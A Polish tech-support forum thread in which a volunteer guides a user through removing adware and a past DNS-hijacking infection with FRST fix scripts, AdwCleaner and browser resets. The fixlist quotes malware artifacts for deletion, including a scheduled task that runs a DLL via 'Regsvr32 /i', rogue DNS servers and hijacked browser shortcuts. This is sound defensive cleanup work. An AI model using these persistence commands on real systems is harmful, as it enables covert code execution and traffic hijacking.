(Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). moncar Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 4. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Z rozwiązań darmowych polecam rozwiązanie firmy Avast, zaś z płatnych rozwiązanie firmy Kaspersky. Pamiętaj, że to nie produkt jest Twoją pierwszą linią ochrony a sam Ty. 1. Zagrożenia wykryte przez Malwarebytes daj do kasacji. 2. Podsumuj obecny stan systemu i problemu z jakim się zgłosiłeś.

Przepraszam za opóźnienia. W raportach brak oznak jakichkolwiek infekcji. Skoro sytuacja na dwóch komputerach jest analogiczna to ja również przypuściłbym stwierdzenie, że to problem po stronie dostawcy, - a nie po stronie klienta. Temat przenoszę do działu Sieci.

Na temat SpyHunter poczytaj sobie w spoilerze. System jest zainfekowany przez infekcje adware oraz PUP (które powodują defekty wypisane przez Ciebie). Ślady pozostawione w systemie (martwe adresy Izraelskie) wskazują* na (w przeszłości) obecną infekcję DNS Unlocker / Trojan.DNS. Myślę, że szybko się z tym uporamy (choć do zwalczenie jest UCBrowser, które może się bronić). Przeczytaj: KLIK. 1. Włącz przywracanie systemu. 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: Task: {99635C4F-3516-4878-BC16-8E106567AFC3} - System32\Tasks\UCBrowserSecureUpdater => C:\Program Files (x86)\UCBrowser\Security\uclauncher.exe [2017-03-11] (UC Web Inc.) Task: {AF2A026E-9293-45FC-A9A9-8E51B56CEADB} - System32\Tasks\{7FBF4EFF-853F-366E-CF01-A056035EC122} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\52b53b4\15bbccb8.dll" Task: {DD3F4D4C-3693-41EA-9000-FA7B755CE4CB} - System32\Tasks\{2A435AC5-9DE8-ED6E-4973-5B30EEB69026} => C:\ProgramData\{DEB7C27A-691C-75D1-B290-7BCD06321079}\86B7E5BD- 311C-5216-1DE2-0AF056F5D4E8.exe Task: {60DFB6F7-494C-4C95-8AFB-8BCED386D635} - System32\Tasks\Ckerbulemahitain Provider => C:\Program Files (x86)\Lafetqilse\atuhesy.exe C:\Program Files (x86)\Lafetqilse WMI_ActiveScriptEventConsumer_ASEC: ShortcutWithArgument: C:\Users\Lenovo\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Lenovo\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/ ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Lenovo\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/ ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://qtipr.com/ ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Lenovo\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/ ShortcutWithArgument: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://qtipr.com/ AlternateDataStreams: C:\WINDOWS\system32\drivers:ucdrv-x64.sys [25444] AlternateDataStreams: C:\WINDOWS\system32\drivers:x64 [1498914] AlternateDataStreams: C:\WINDOWS\system32\drivers:x86 [1223458] HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1 HKLM\...\Providers\h49mkssl: C:\Program Files (x86)\Ckerbulemahitain Provider\local64spl.dll C:\Program Files (x86)\Ckerbulemahitain Provider ShellExecuteHooks: Brak nazwy - {D1CD7500-DE3D-11E6-8016-64006A5CFC23} - C:\Program Files (x86)\Plerqer\Pafght.dll -> Brak pliku C:\Program Files (x86)\Plerqer ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku SearchScopes: HKU\S-1-5-21-2037147976-1584751365-2601269577-1003 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-2037147976-1584751365-2601269577-1003 -> {8C65EB5C-AE03-4984-B8EB-7C9B00C867C3} URL = R1 ucdrv; C:\WINDOWS\System32\drivers:ucdrv-x64.sys [25444 ] (UC Web Inc.) 2017-04-10 19:14 - 2017-04-10 19:14 - 00014658 _____ C:\Users\Lenovo\Downloads\[Electro-Torrent.pl] SpyHunter 4.21.10.4585 [Ml-Eng] [Cicha instalacja & portable].torrent C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FIFA 15\FIFA 15.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FIFA 15\FIFA 15使用者授權協議.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FIFA 15\技術支援.lnk C:\Users\Public\Desktop\Download Crack Setup.ex...lnk C:\Users\Public\Desktop\Gadget DT.lnk Tcpip\Parameters: [NameServer] 82.163.143.176 82.163.142.178 CMD: ipconfig /flushdns Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść i (dodatkowo) zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie inne nieznane i niepotrzebne Ci rozszerzenia Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin 4. Wyczyść i (dodatkowo) zabezpiecz przeglądarkę Mozilla FireFox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 5. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. 6. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut). Dołącz też plik fixlog.txt. * - sprawdziłem adres IP, z którego się logujesz na forum i bieżące adres DNS w Twoim systemie są polskie, w logu Addition także, - tak na pewno to już martwa infekcja.

Raport ucięty. Dostarcz poprawny.

Panie, nie czekasz Pan nawet doby...pomoc jest udzielana darmowo, charytatywnie dzięki wiedzy zdobywanej przez lata przeze mnie i picasso, która została wyróżniona przez Microsoft. Posty łączę w jeden post, używaj opcji Edytuj jeśli to konieczne, następnie podbijanie tematu bez uzasadnienie skończy się zakończeniem pomocy na forum z mojej strony i wlepionym ostrzeżeniem. Wszystko pomyślnie wykonana, skasuj ręcznie przez SHIFT + DEL następujący profil Google Chrome: C:\Users\admin\AppData\Local\Google\Chrome\User Data\ChromeDefaultData. Temat przenoszę do działu Windows 10, gdzie zostanie Ci udzielana pomoc z resztą problemów, bo system z infekcji został wyczyszczony.